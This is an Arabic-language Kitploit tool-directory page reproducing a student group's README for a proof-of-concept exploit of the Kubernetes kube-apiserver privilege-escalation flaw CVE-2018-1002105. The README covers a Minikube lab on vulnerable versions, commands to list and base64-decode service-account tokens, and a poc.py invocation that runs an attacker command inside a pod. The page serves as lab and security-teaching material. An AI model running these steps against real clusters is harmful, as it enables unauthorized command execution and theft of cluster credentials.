Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2018-1002105 — إثبات مفهوم لاستغلال CVE-2018-1002105، وهي ثغرة تصعيد صلاحيات في Kubernetes تسمح بتنفيذ أوامر غير مصرح بها داخل الحاويات (pods) عبر خادم kube-apiserver. | Kitploit
أدوات/GitHubGitHub/sh-ubh/cve-2018-1002105
تصعيد الامتيازاتأمن الحاوياتتحليل الثغرات الأمنيةالاستغلالاختبار الاختراقأمن السحابة
GitHubsh-ubh/cve-2018-1002105

CVE-2018-1002105

إثبات مفهوم لاستغلال CVE-2018-1002105، وهي ثغرة تصعيد صلاحيات في Kubernetes تسمح بتنفيذ أوامر غير مصرح بها داخل الحاويات (pods) عبر خادم kube-apiserver.

عرض المستودع
12منذ 4 سنواتلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CMPT733-Group11(0x90)

CVE-2018-1002105

الأعضاء: Abhishek Rungta, Shubham Saini, Siddhant Sood

إعداد البيئة

  • جهاز افتراضي بنظام لينكس (مثل Ubuntu 20.04)
  • Minikube للنشر المحلي لـ Kubernetes
  • أي من هذه الإصدارات الأقدم (1.0.x— 1.9.x, 1.10.0—1.10.10,1.11.0—1.11.4,1.12.0—1.12.2)

تشغيل الاستغلال

لقد وفرنا صورة جهاز افتراضي (ملف .ova) قم بتنزيلها وإنشاء جهاز افتراضي منها. الصورة ova المقدمة مُهيأة مسبقًا مع docker v18.09 و minikube v1.9.0

رابط OVA

بناء مجموعة Kubernetes

نظرًا لأن صورتنا الافتراضية تحتوي بالفعل على minkube وإصدارات kubernetes المطلوبة، فقط قم بتشغيل الأمر التالي لبدء minikube

root@kitploit:~
minikube start --kubernetes-version=v1.12.2

إنشاء مستخدم جديد و namespace وتعيين دور

قم بإنشاء مستخدم جديد و namespace وقم بتعيين دور RBAC للمستخدم الذي تم إنشاؤه باستخدام الأمر التالي.

root@kitploit:~
kubectl apply -f fixing_policy.yml

إزالة الوصول إلى conntract

root@kitploit:~
kubectl edit configmaps kube-proxy --namespace=kube-system

غيّر قيمة maxPerCore إلى 0

الحصول على رمز JWT

أولاً، قم بتشغيل الأمر التالي للحصول على جميع رموز jwt المخزنة في النظام

root@kitploit:~
kubectl get secrets -A

للحصول على secret الخاص بالمستخدم المحدد الذي تم إنشاؤه، قم بتشغيل الأمر التالي:

root@kitploit:~
kubectl -n [namespace] get secrets [user-token] -o json

ثم قم بفك ترميزه بواسطة base64.

root@kitploit:~
export TOKEN=$(echo TOKEN | base64 -d)
echo $TOKEN

الحصول على عنوان IP ورقم المنفذ

root@kitploit:~
kubectl cluster-info

لنشر الـ pod

root@kitploit:~
kubectl run --image=nginx:alpine securenginx -n poc

تشغيل الـ POC

حدد جميع الوسائط المطلوبة:
-t للهدف> ip:port (مطلوب)
-j لرمز JWT الخاص بالمستخدم (مطلوب)
-p للـ pod (مطلوب)
-n للـ namespace
-m للطريقة (مطلوب)
-c للحاوية
-x لأمر المهاجم

حالة اختبار

الإدخال

root@kitploit:~
./poc.py -t [IP:Port] -j [token] -p [pod] -n [namespace] -m attach -x "command"
root@kitploit:~
./poc.py -t 127.0.0.1:32768 -j $TOKEN -p securenginx -m attach -n poc -x "ifconfig eth0" 

الإخراج

root@kitploit:~
eth0      Link encap:Ethernet  HWaddr 02:42:AC:11:00:02  
          inet addr:172.17.0.2  Bcast:172.17.255.255  Mask:255.255.0.0
          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
          RX packets:1313 errors:0 dropped:0 overruns:0 frame:0
          TX packets:1224 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:0 
          RX bytes:217603 (212.5 KiB)  TX bytes:428778 (418.7 KiB)

{"metadata":{},"status":"Success"}

عرض الفيديو

فيديو تجريبي رابط

تنزيل الأداة